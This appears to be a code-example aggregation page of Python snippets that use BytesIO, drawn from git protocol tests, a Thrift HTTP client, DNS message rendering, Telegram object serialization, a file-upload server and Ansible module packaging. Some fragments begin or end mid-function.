        def generate_pack_data(have, want, ofs_delta=False):
            return pack_objects_to_data([(commit, None), (tree, ''), ])

        result = self.client.send_pack("blah", update_refs, generate_pack_data)
        self.assertEqual(
            {b'refs/foo/bar': 'pre-receive hook declined'},
            result.ref_status)
        self.assertEqual({b'refs/foo/bar': commit.id}, result.refs)

    def test_send_pack_none(self):
        # Set ref to current value
        self.rin.write(
            b'0078310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00 report-status delete-refs '
            b'side-band-64k quiet ofs-delta\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_send_pack_keep_and_delete(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'003f310ca9477129b8586fa2afc779c1f57cf64bba6c refs/heads/keepme\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/master\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'0000000000000000000000000000000000000000 '
            b'refs/heads/master\x00delete-refs ofs-delta report-status0000')

    def test_send_pack_delete_only(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/master\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'0000000000000000000000000000000000000000 '
            b'refs/heads/master\x00delete-refs ofs-delta report-status0000')

    def test_send_pack_new_ref_only(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/blah12\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {
                b'refs/heads/blah12':
                b'310ca9477129b8586fa2afc779c1f57cf64bba6c',
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        f = BytesIO()
        write_pack_objects(f, {})
        self.client.send_pack('/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b0000000000000000000000000000000000000000 '
            b'310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/blah12\x00delete-refs ofs-delta report-status0000' +
            f.getvalue())

    def test_send_pack_new_ref(self):
        self.rin.write(
            b'0064310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00 report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/blah12\n'
            b'0000')
        self.rin.seek(0)

        tree = Tree()
        commit = Commit()
        commit.tree = tree
        commit.parents = []
        commit.author = commit.committer = b'test user'
        commit.commit_time = commit.author_time = 1174773719
        commit.commit_timezone = commit.author_timezone = 0
        commit.encoding = b'UTF-8'
        commit.message = b'test message'

        def update_refs(refs):
            return {
                b'refs/heads/blah12': commit.id,
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return pack_objects_to_data([(commit, None), (tree, b''), ])

        f = BytesIO()
        write_pack_data(f, *generate_pack_data(None, None))
        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b0000000000000000000000000000000000000000 ' + commit.id +
            b' refs/heads/blah12\x00delete-refs ofs-delta report-status0000' +
            f.getvalue())

    def test_send_pack_no_deleteref_delete_only(self):
        pkts = [b'310ca9477129b8586fa2afc779c1f57cf64bba6c refs/heads/master'
                b'\x00 report-status ofs-delta\n',
                b'',
                b'']
        for pkt in pkts:
            if pkt == b'':
                self.rin.write(b"0000")
            else:
                self.rin.write(("%04x" % (len(pkt)+4)).encode('ascii') + pkt)
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        result = self.client.send_pack(b"/", update_refs, generate_pack_data)
        self.assertEqual(
            result.ref_status,
            {b'refs/heads/master': 'remote does not support deleting refs'})
        self.assertEqual(
            result.refs,
            {b'refs/heads/master':
             b'310ca9477129b8586fa2afc779c1f57cf64bba6c'})
        self.assertEqual(self.rout.getvalue(), b'0000')
Exemple #34
0
class THttpClient(TTransportBase):
    def __init__(self, uri_or_host, port=None, path=None):
        if port is not None:
            warnings.warn(
                "gunakan THttpClient di sini('http://host:port/path') syntax",
                DeprecationWarning,
                stacklevel=2)
            self.host = uri_or_host
            self.port = port
            assert path
            self.path = path
            self.scheme = 'http'
        else:
            parsed = urllib.parse.urlparse(uri_or_host)
            self.scheme = parsed.scheme
            assert self.scheme in ('http', 'https')
            if self.scheme == 'http':
                self.port = parsed.port or http_client.HTTP_PORT
            elif self.scheme == 'https':
                self.port = parsed.port or http_client.HTTPS_PORT
            self.host = parsed.hostname
            self.path = parsed.path
            if parsed.query:
                self.path += '?%s' % parsed.query
        proxy = None
        self.realhost = self.realport = self.proxy_auth = None
        self.__wbuf = BytesIO()
        self.__http = None
        self.__http_response = None
        self.__timeout = None
        self.__custom_headers = None
        self.__time = time.time()
        self.__loop = 0
    @staticmethod
    def basic_proxy_auth_header(proxy):
        if proxy is None or not proxy.username:
            return None
        ap = "%s:%s" % (urllib.parse.unquote(proxy.username),
                        urllib.parse.unquote(proxy.password))
        cr = base64.b64encode(ap).strip()
        return "Basic " + cr
    def using_proxy(self):
        return self.realhost is not None
    def open(self):
        if self.scheme == 'http':
            self.__http = http_client.HTTPConnection(self.host, self.port)
        elif self.scheme == 'https':
            self.__http = http_client.HTTPSConnection(self.host, self.port)
    def close(self):
        self.__http.close()
        self.__http = None
        self.__http_response = None
    def isOpen(self):
        return self.__http is not None
    def setTimeout(self, ms):
        if not hasattr(socket, 'getdefaulttimeout'):
            raise NotImplementedError
        if ms is None:
            self.__timeout = None
        else:
            self.__timeout = ms / 1000.0
    def setCustomHeaders(self, headers):
        self.__custom_headers = headers
    def read(self, sz):
        return self.__http_response.read(sz)
    def write(self, buf):
        self.__wbuf.write(buf)
    def __withTimeout(f):
        def _f(*args, **kwargs):
            orig_timeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(args[0].__timeout)
            try:
                result = f(*args, **kwargs)
            finally:
                socket.setdefaulttimeout(orig_timeout)
            return result
        return _f
    def flush(self):
        if self.__loop <= 2:
            if self.isOpen(): self.close()
            self.open(); self.__loop += 1
        elif time.time() - self.__time > 90:
            self.close(); self.open(); self.__time = time.time()
        data = self.__wbuf.getvalue()
        self.__wbuf = BytesIO()
        self.__http.putrequest('POST', self.path)
        self.__http.putheader('Host', self.host)
        self.__http.putheader('Content-Type', 'application/x-thrift')
        self.__http.putheader('Content-Length', str(len(data)))
        if self.__custom_headers:
            for key, val in six.iteritems(self.__custom_headers):
                self.__http.putheader(key, val)
        self.__http.endheaders()
        self.__http.send(data)
        self.__http_response = self.__http.getresponse()
        self.code = self.__http_response.status
        self.message = self.__http_response.reason
        self.headers = self.__http_response.msg
Exemple #35
0
class Response(object):
    def __init__(self, binary_support, non_binary_content_type_prefixes):
        self.status_code = 500
        self.headers = []
        self.body = BytesIO()
        self.binary_support = binary_support
        self.non_binary_content_type_prefixes = non_binary_content_type_prefixes

    def start_response(self, status, response_headers, exc_info=None):
        if exc_info is not None:
            raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
        self.status_code = int(status.split()[0])
        self.headers.extend(response_headers)
        return self.body.write

    def consume(self, result):
        try:
            for data in result:
                if data:
                    self.body.write(data)
        finally:
            if hasattr(result, "close"):
                result.close()

    def as_apig_response(self):
        response = {
            "statusCode": self.status_code,
            "headers": dict(self.headers)
        }
        if self._should_send_binary():
            response["isBase64Encoded"] = True
            response["body"] = b64encode(self.body.getvalue()).decode("utf-8")
        else:
            response["body"] = self.body.getvalue().decode("utf-8")

        return response

    def _should_send_binary(self):
        """
        Determines if binary response should be sent to API Gateway
        """
        if not self.binary_support:
            return False

        content_type = self._get_content_type()
        if not content_type.startswith(self.non_binary_content_type_prefixes):
            return True

        content_encoding = self._get_content_encoding()
        # Content type is non-binary but the content encoding might be.
        return "gzip" in content_encoding.lower()

    def _get_content_type(self):
        return self._get_header("content-type") or ""

    def _get_content_encoding(self):
        return self._get_header("content-encoding") or ""

    def _get_header(self, header_name):
        header_name = header_name.lower()
        matching_headers = [
            v for k, v in self.headers if k.lower() == header_name
        ]
        if len(matching_headers):
            return matching_headers[-1]
        return None
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.popup else 0
        flags |= (1 << 1) if self.inbox_date is not None else 0
        data.write(Int(flags))
        
        if self.inbox_date is not None:
            data.write(Int(self.inbox_date))
        
        data.write(String(self.type))
        
        data.write(String(self.message))
        
        data.write(self.media.write())
        
        data.write(Vector(self.entities))
        
        return data.getvalue()
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        # No flags
        
        b.write(Int(self.pts))
        
        b.write(Int(self.qts))
        
        b.write(Int(self.date))
        
        b.write(Int(self.seq))
        
        b.write(Int(self.unread_count))
        
        return b.getvalue()
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.gallery else 0
        flags |= (1 << 1) if self.next_offset is not None else 0
        flags |= (1 << 2) if self.switch_pm is not None else 0
        data.write(Int(flags))

        data.write(Long(self.query_id))

        if self.next_offset is not None:
            data.write(String(self.next_offset))

        if self.switch_pm is not None:
            data.write(self.switch_pm.write())

        data.write(Vector(self.results))

        data.write(Int(self.cache_time))

        data.write(Vector(self.users))

        return data.getvalue()
Exemple #39
0
class Renderer(object):
    """Helper class for building DNS wire-format messages.
    Most applications can use the higher-level L{thirdparty.dns.message.Message}
    class and its to_wire() method to generate wire-format messages.
    This class is for those applications which need finer control
    over the generation of messages.
    Typical use::
        r = thirdparty.dns.renderer.Renderer(id=1, flags=0x80, max_size=512)
        r.add_question(qname, qtype, qclass)
        r.add_rrset(thirdparty.dns.renderer.ANSWER, rrset_1)
        r.add_rrset(thirdparty.dns.renderer.ANSWER, rrset_2)
        r.add_rrset(thirdparty.dns.renderer.AUTHORITY, ns_rrset)
        r.add_edns(0, 0, 4096)
        r.add_rrset(thirdparty.dns.renderer.ADDTIONAL, ad_rrset_1)
        r.add_rrset(thirdparty.dns.renderer.ADDTIONAL, ad_rrset_2)
        r.write_header()
        r.add_tsig(keyname, secret, 300, 1, 0, '', request_mac)
        wire = r.get_wire()
    output, a BytesIO, where rendering is written
    id: the message id
    flags: the message flags
    max_size: the maximum size of the message
    origin: the origin to use when rendering relative names
    compress: the compression table
    section: an int, the section currently being rendered
    counts: list of the number of RRs in each section
    mac: the MAC of the rendered message (if TSIG was used)
    """

    def __init__(self, id=None, flags=0, max_size=65535, origin=None):
        """Initialize a new renderer."""

        self.output = BytesIO()
        if id is None:
            self.id = random.randint(0, 65535)
        else:
            self.id = id
        self.flags = flags
        self.max_size = max_size
        self.origin = origin
        self.compress = {}
        self.section = QUESTION
        self.counts = [0, 0, 0, 0]
        self.output.write(b'\x00' * 12)
        self.mac = ''

    def _rollback(self, where):
        """Truncate the output buffer at offset *where*, and remove any
        compression table entries that pointed beyond the truncation
        point.
        """

        self.output.seek(where)
        self.output.truncate()
        keys_to_delete = []
        for k, v in self.compress.items():
            if v >= where:
                keys_to_delete.append(k)
        for k in keys_to_delete:
            del self.compress[k]

    def _set_section(self, section):
        """Set the renderer's current section.
        Sections must be rendered order: QUESTION, ANSWER, AUTHORITY,
        ADDITIONAL.  Sections may be empty.
        Raises thirdparty.dns.exception.FormError if an attempt was made to set
        a section value less than the current section.
        """

        if self.section != section:
            if self.section > section:
                raise thirdparty.dns.exception.FormError
            self.section = section

    def add_question(self, qname, rdtype, rdclass=thirdparty.dns.rdataclass.IN):
        """Add a question to the message."""

        self._set_section(QUESTION)
        before = self.output.tell()
        qname.to_wire(self.output, self.compress, self.origin)
        self.output.write(struct.pack("!HH", rdtype, rdclass))
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[QUESTION] += 1

    def add_rrset(self, section, rrset, **kw):
        """Add the rrset to the specified section.
        Any keyword arguments are passed on to the rdataset's to_wire()
        routine.
        """

        self._set_section(section)
        before = self.output.tell()
        n = rrset.to_wire(self.output, self.compress, self.origin, **kw)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[section] += n

    def add_rdataset(self, section, name, rdataset, **kw):
        """Add the rdataset to the specified section, using the specified
        name as the owner name.
        Any keyword arguments are passed on to the rdataset's to_wire()
        routine.
        """

        self._set_section(section)
        before = self.output.tell()
        n = rdataset.to_wire(name, self.output, self.compress, self.origin,
                             **kw)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[section] += n

    def add_edns(self, edns, ednsflags, payload, options=None):
        """Add an EDNS OPT record to the message."""

        # make sure the EDNS version in ednsflags agrees with edns
        ednsflags &= 0xFF00FFFF
        ednsflags |= (edns << 16)
        self._set_section(ADDITIONAL)
        before = self.output.tell()
        self.output.write(struct.pack('!BHHIH', 0, thirdparty.dns.rdatatype.OPT, payload,
                                      ednsflags, 0))
        if options is not None:
            lstart = self.output.tell()
            for opt in options:
                stuff = struct.pack("!HH", opt.otype, 0)
                self.output.write(stuff)
                start = self.output.tell()
                opt.to_wire(self.output)
                end = self.output.tell()
                assert end - start < 65536
                self.output.seek(start - 2)
                stuff = struct.pack("!H", end - start)
                self.output.write(stuff)
                self.output.seek(0, 2)
            lend = self.output.tell()
            assert lend - lstart < 65536
            self.output.seek(lstart - 2)
            stuff = struct.pack("!H", lend - lstart)
            self.output.write(stuff)
            self.output.seek(0, 2)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[ADDITIONAL] += 1

    def add_tsig(self, keyname, secret, fudge, id, tsig_error, other_data,
                 request_mac, algorithm=thirdparty.dns.tsig.default_algorithm):
        """Add a TSIG signature to the message."""

        s = self.output.getvalue()
        (tsig_rdata, self.mac, ctx) = thirdparty.dns.tsig.sign(s,
                                                    keyname,
                                                    secret,
                                                    int(time.time()),
                                                    fudge,
                                                    id,
                                                    tsig_error,
                                                    other_data,
                                                    request_mac,
                                                    algorithm=algorithm)
        self._write_tsig(tsig_rdata, keyname)

    def add_multi_tsig(self, ctx, keyname, secret, fudge, id, tsig_error,
                       other_data, request_mac,
                       algorithm=thirdparty.dns.tsig.default_algorithm):
        """Add a TSIG signature to the message. Unlike add_tsig(), this can be
        used for a series of consecutive DNS envelopes, e.g. for a zone
        transfer over TCP [RFC2845, 4.4].
        For the first message in the sequence, give ctx=None. For each
        subsequent message, give the ctx that was returned from the
        add_multi_tsig() call for the previous message."""

        s = self.output.getvalue()
        (tsig_rdata, self.mac, ctx) = thirdparty.dns.tsig.sign(s,
                                                    keyname,
                                                    secret,
                                                    int(time.time()),
                                                    fudge,
                                                    id,
                                                    tsig_error,
                                                    other_data,
                                                    request_mac,
                                                    ctx=ctx,
                                                    first=ctx is None,
                                                    multi=True,
                                                    algorithm=algorithm)
        self._write_tsig(tsig_rdata, keyname)
        return ctx

    def _write_tsig(self, tsig_rdata, keyname):
        self._set_section(ADDITIONAL)
        before = self.output.tell()

        keyname.to_wire(self.output, self.compress, self.origin)
        self.output.write(struct.pack('!HHIH', thirdparty.dns.rdatatype.TSIG,
                                      thirdparty.dns.rdataclass.ANY, 0, 0))
        rdata_start = self.output.tell()
        self.output.write(tsig_rdata)

        after = self.output.tell()
        assert after - rdata_start < 65536
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig

        self.output.seek(rdata_start - 2)
        self.output.write(struct.pack('!H', after - rdata_start))
        self.counts[ADDITIONAL] += 1
        self.output.seek(10)
        self.output.write(struct.pack('!H', self.counts[ADDITIONAL]))
        self.output.seek(0, 2)

    def write_header(self):
        """Write the DNS message header.
        Writing the DNS message header is done after all sections
        have been rendered, but before the optional TSIG signature
        is added.
        """

        self.output.seek(0)
        self.output.write(struct.pack('!HHHHHH', self.id, self.flags,
                                      self.counts[0], self.counts[1],
                                      self.counts[2], self.counts[3]))
        self.output.seek(0, 2)

    def get_wire(self):
        """Return the wire format message."""

        return self.output.getvalue()
Exemple #40
0
    def list_directory(self, path):
        """Helper to produce a directory listing (absent index.html).

        Return value is either a file object, or None (indicating an
        error).  In either case, the headers are sent, making the
        interface the same as for send_head().

        """
        try:
            list = os.listdir(path)
        except os.error:
            self.send_error(404, "No permission to list directory")
            return None
        list.sort(key=lambda a: a.lower())
        f = BytesIO()
        displaypath = cgi.escape(urllib.parse.unquote(self.path))
        f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
        f.write(("<html>\n<title>SuperTransfer json Upload %s</title>\n" %
                 displaypath).encode())
        f.write(b"<body>\n<h2>SuperTransfer Config</h2>\n")
        f.write(b"<h4>Upload Your Gsuite Service Account Json Keys Here.</h2>")
        f.write(
            b"<a href='https://rclone.org/drive/#service-account-support'>Click Here For Instructions</a>"
        )
        f.write(b"<hr>\n")
        f.write(b"<form ENCTYPE=\"multipart/form-data\" method=\"post\">")
        f.write(b"<input name=\"file\" type=\"file\"/>")
        f.write(b"<input type=\"submit\" value=\"upload\"/></form>\n")
        f.write(b"<hr>\n<ul>\n")
        for name in list:
            fullname = os.path.join(path, name)
            displayname = linkname = name
            # Append / for directories or @ for symbolic links
            if os.path.isdir(fullname):
                displayname = name + "/"
                linkname = name + "/"
            if os.path.islink(fullname):
                displayname = name + "@"
                # Note: a link to a directory displays with @ and links with /
            f.write(('<li><a href="%s">%s</a>\n' %
                     (urllib.parse.quote(linkname),
                      cgi.escape(displayname))).encode())
        f.write(b"</ul>\n<hr>\n</body>\n</html>\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        return f
Exemple #41
0
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 1) if self.title is not None else 0
        flags |= (1 << 2) if self.description is not None else 0
        data.write(Int(flags))

        data.write(String(self.id))

        data.write(String(self.type))

        if self.title is not None:
            data.write(String(self.title))

        if self.description is not None:
            data.write(String(self.description))

        data.write(self.document.write())

        data.write(self.send_message.write())

        return data.getvalue()
Exemple #42
0
class seek_wrapper:
	"""Adds a seek method to a file object.

	This is only designed for seeking on readonly file-like objects.

	Wrapped file-like object must have a read method.  The readline method is
	only supported if that method is present on the wrapped object.  The
	readlines method is always supported.  xreadlines and iteration are
	supported only for Python 2.2 and above.

	Public attributes:

	wrapped: the wrapped file object
	is_closed: true iff .close() has been called

	WARNING: All other attributes of the wrapped object (ie. those that are not
	one of wrapped, read, readline, readlines, xreadlines, __iter__ and next)
	are passed through unaltered, which may or may not make sense for your
	particular file object.

	"""

	# General strategy is to check that cache is full enough, then delegate to
	# the cache (self.__cache, which is a BytesIO instance).  A seek
	# position (self.__pos) is maintained independently of the cache, in order
	# that a single cache may be shared between multiple seek_wrapper objects.
	# Copying using module copy shares the cache in this way.

	def __init__(self, wrapped):
		self.wrapped = wrapped
		self.__read_complete_state = [False]
		self.__is_closed_state = [False]
		self.__have_readline = hasattr(self.wrapped, "readline")
		self.__cache = BytesIO()
		self.__pos = 0  # seek position

	def invariant(self):
		# The end of the cache is always at the same place as the end of the
		# wrapped file (though the .tell() method is not required to be present
		# on wrapped file).
		return self.wrapped.tell() == len(self.__cache.getvalue())

	def close(self):
		self.wrapped.close()
		self.is_closed = True

	def __getattr__(self, name):
		if name == "is_closed":
			return self.__is_closed_state[0]
		elif name == "read_complete":
			return self.__read_complete_state[0]

		wrapped = self.__dict__.get("wrapped")
		if wrapped:
			return getattr(wrapped, name)

		return getattr(self.__class__, name)

	def __setattr__(self, name, value):
		if name == "is_closed":
			self.__is_closed_state[0] = bool(value)
		elif name == "read_complete":
			if not self.is_closed:
				self.__read_complete_state[0] = bool(value)
		else:
			self.__dict__[name] = value

	def seek(self, offset, whence=0):
		assert whence in [0, 1, 2]

		# how much data, if any, do we need to read?
		if whence == 2:  # 2: relative to end of *wrapped* file
			if offset < 0:
				raise ValueError("negative seek offset")
			# since we don't know yet where the end of that file is, we must
			# read everything
			to_read = None
		else:
			if whence == 0:  # 0: absolute
				if offset < 0:
					raise ValueError("negative seek offset")
				dest = offset
			else:  # 1: relative to current position
				pos = self.__pos
				if pos < offset:
					raise ValueError("seek to before start of file")
				dest = pos + offset
			end = len_of_seekable(self.__cache)
			to_read = dest - end
			if to_read < 0:
				to_read = 0

		if to_read != 0:
			self.__cache.seek(0, 2)
			if to_read is None:
				assert whence == 2
				self.__cache.write(self.wrapped.read())
				self.read_complete = True
				self.__pos = self.__cache.tell() - offset
			else:
				data = self.wrapped.read(to_read)
				if not data:
					self.read_complete = True
				else:
					self.__cache.write(data)
				# Don't raise an exception even if we've seek()ed past the end
				# of .wrapped, since fseek() doesn't complain in that case.
				# Also like fseek(), pretend we have seek()ed past the end,
				# i.e. not:
				# self.__pos = self.__cache.tell()
				# but rather:
				self.__pos = dest
		else:
			self.__pos = dest

	def tell(self):
		return self.__pos

	def __copy__(self):
		cpy = self.__class__(self.wrapped)
		cpy.__cache = self.__cache
		cpy.__read_complete_state = self.__read_complete_state
		cpy.__is_closed_state = self.__is_closed_state
		return cpy

	def get_data(self):
		pos = self.__pos
		try:
			self.seek(0)
			return self.read(-1)
		finally:
			self.__pos = pos

	def read(self, size=-1):
		pos = self.__pos
		end = len_of_seekable(self.__cache)
		available = end - pos

		# enough data already cached?
		if size <= available and size != -1:
			self.__cache.seek(pos)
			self.__pos = pos + size
			return self.__cache.read(size)

		# no, so read sufficient data from wrapped file and cache it
		self.__cache.seek(0, 2)
		if size == -1:
			self.__cache.write(self.wrapped.read())
			self.read_complete = True
		else:
			to_read = size - available
			assert to_read > 0
			data = self.wrapped.read(to_read)
			if not data:
				self.read_complete = True
			else:
				self.__cache.write(data)
		self.__cache.seek(pos)

		data = self.__cache.read(size)
		self.__pos = self.__cache.tell()
		assert self.__pos == pos + len(data)
		return data

	def readline(self, size=-1):
		if not self.__have_readline:
			raise NotImplementedError("no readline method on wrapped object")

		# line we're about to read might not be complete in the cache, so
		# read another line first
		pos = self.__pos
		self.__cache.seek(0, 2)
		data = self.wrapped.readline()
		if not data:
			self.read_complete = True
		else:
			self.__cache.write(data)
		self.__cache.seek(pos)

		data = self.__cache.readline()
		if size != -1:
			r = data[:size]
			self.__pos = pos + size
		else:
			r = data
			self.__pos = pos + len(data)
		return r

	def readlines(self, sizehint=-1):
		pos = self.__pos
		self.__cache.seek(0, 2)
		self.__cache.write(self.wrapped.read())
		self.read_complete = True
		self.__cache.seek(pos)
		data = self.__cache.readlines(sizehint)
		self.__pos = self.__cache.tell()
		return data

	def __iter__(self):
		return self

	def __next__(self):
		line = self.readline()
		if line == "":
			raise StopIteration
		return line
	next = __next__

	xreadlines = __iter__

	def __repr__(self):
		return ("<%s at %s whose wrapped object = %r>" %
				(self.__class__.__name__, hex(abs(id(self))), self.wrapped))
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.pinned else 0
        data.write(Int(flags))

        data.write(self.peer.write())

        data.write(Vector(self.messages, Int))

        data.write(Int(self.pts))

        data.write(Int(self.pts_count))

        return data.getvalue()
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.min else 0
        flags |= (1 << 1) if self.results is not None else 0
        flags |= (1 << 2) if self.total_voters is not None else 0
        flags |= (1 << 3) if self.recent_voters is not None else 0
        flags |= (1 << 4) if self.solution is not None else 0
        flags |= (1 << 4) if self.solution_entities is not None else 0
        data.write(Int(flags))

        if self.results is not None:
            data.write(Vector(self.results))

        if self.total_voters is not None:
            data.write(Int(self.total_voters))

        if self.recent_voters is not None:
            data.write(Vector(self.recent_voters, Int))

        if self.solution is not None:
            data.write(String(self.solution))

        if self.solution_entities is not None:
            data.write(Vector(self.solution_entities))

        return data.getvalue()
Exemple #45
0
def _find_module_utils(module_name, b_module_data, module_path, module_args, task_vars, module_compression, async_timeout, become,
                       become_method, become_user, become_password, environment):
    """
    Given the source of the module, convert it to a Jinja2 template to insert
    module code and return whether it's a new or old style module.
    """
    module_substyle = module_style = 'old'

    # module_style is something important to calling code (ActionBase).  It
    # determines how arguments are formatted (json vs k=v) and whether
    # a separate arguments file needs to be sent over the wire.
    # module_substyle is extra information that's useful internally.  It tells
    # us what we have to look to substitute in the module files and whether
    # we're using module replacer or ansiballz to format the module itself.
    if _is_binary(b_module_data):
        module_substyle = module_style = 'binary'
    elif REPLACER in b_module_data:
        # Do REPLACER before from ansible.module_utils because we need make sure
        # we substitute "from ansible.module_utils basic" for REPLACER
        module_style = 'new'
        module_substyle = 'python'
        b_module_data = b_module_data.replace(REPLACER, b'from ansible.module_utils.basic import *')
    elif b'from ansible.module_utils.' in b_module_data:
        module_style = 'new'
        module_substyle = 'python'
    elif REPLACER_WINDOWS in b_module_data or re.search(b'#Requires \-Module', b_module_data, re.IGNORECASE):
        module_style = 'new'
        module_substyle = 'powershell'
    elif REPLACER_JSONARGS in b_module_data:
        module_style = 'new'
        module_substyle = 'jsonargs'
    elif b'WANT_JSON' in b_module_data:
        module_substyle = module_style = 'non_native_want_json'

    shebang = None
    # Neither old-style, non_native_want_json nor binary modules should be modified
    # except for the shebang line (Done by modify_module)
    if module_style in ('old', 'non_native_want_json', 'binary'):
        return b_module_data, module_style, shebang

    output = BytesIO()
    py_module_names = set()

    if module_substyle == 'python':
        params = dict(ANSIBLE_MODULE_ARGS=module_args,)
        python_repred_params = repr(json.dumps(params))

        try:
            compression_method = getattr(zipfile, module_compression)
        except AttributeError:
            display.warning(u'Bad module compression string specified: %s.  Using ZIP_STORED (no compression)' % module_compression)
            compression_method = zipfile.ZIP_STORED

        lookup_path = os.path.join(C.DEFAULT_LOCAL_TMP, 'ansiballz_cache')
        cached_module_filename = os.path.join(lookup_path, "%s-%s" % (module_name, module_compression))

        zipdata = None
        # Optimization -- don't lock if the module has already been cached
        if os.path.exists(cached_module_filename):
            display.debug('ANSIBALLZ: using cached module: %s' % cached_module_filename)
            zipdata = open(cached_module_filename, 'rb').read()
        else:
            if module_name in action_write_locks.action_write_locks:
                display.debug('ANSIBALLZ: Using lock for %s' % module_name)
                lock = action_write_locks.action_write_locks[module_name]
            else:
                # If the action plugin directly invokes the module (instead of
                # going through a strategy) then we don't have a cross-process
                # Lock specifically for this module.  Use the "unexpected
                # module" lock instead
                display.debug('ANSIBALLZ: Using generic lock for %s' % module_name)
                lock = action_write_locks.action_write_locks[None]

            display.debug('ANSIBALLZ: Acquiring lock')
            with lock:
                display.debug('ANSIBALLZ: Lock acquired: %s' % id(lock))
                # Check that no other process has created this while we were
                # waiting for the lock
                if not os.path.exists(cached_module_filename):
                    display.debug('ANSIBALLZ: Creating module')
                    # Create the module zip data
                    zipoutput = BytesIO()
                    zf = zipfile.ZipFile(zipoutput, mode='w', compression=compression_method)
                    # Note: If we need to import from release.py first,
                    # remember to catch all exceptions: https://github.com/ansible/ansible/issues/16523
                    zf.writestr('ansible/__init__.py',
                                b'from pkgutil import extend_path\n__path__=extend_path(__path__,__name__)\n__version__="' +
                                to_bytes(__version__) + b'"\n__author__="' +
                                to_bytes(__author__) + b'"\n')
                    zf.writestr('ansible/module_utils/__init__.py', b'from pkgutil import extend_path\n__path__=extend_path(__path__,__name__)\n')

                    zf.writestr('ansible_module_%s.py' % module_name, b_module_data)

                    py_module_cache = {('__init__',): (b'', '[builtin]')}
                    recursive_finder(module_name, b_module_data, py_module_names, py_module_cache, zf)
                    zf.close()
                    zipdata = base64.b64encode(zipoutput.getvalue())

                    # Write the assembled module to a temp file (write to temp
                    # so that no one looking for the file reads a partially
                    # written file)
                    if not os.path.exists(lookup_path):
                        # Note -- if we have a global function to setup, that would
                        # be a better place to run this
                        os.makedirs(lookup_path)
                    display.debug('ANSIBALLZ: Writing module')
                    with open(cached_module_filename + '-part', 'wb') as f:
                        f.write(zipdata)

                    # Rename the file into its final position in the cache so
                    # future users of this module can read it off the
                    # filesystem instead of constructing from scratch.
                    display.debug('ANSIBALLZ: Renaming module')
                    os.rename(cached_module_filename + '-part', cached_module_filename)
                    display.debug('ANSIBALLZ: Done creating module')

            if zipdata is None:
                display.debug('ANSIBALLZ: Reading module after lock')
                # Another process wrote the file while we were waiting for
                # the write lock.  Go ahead and read the data from disk
                # instead of re-creating it.
                try:
                    zipdata = open(cached_module_filename, 'rb').read()
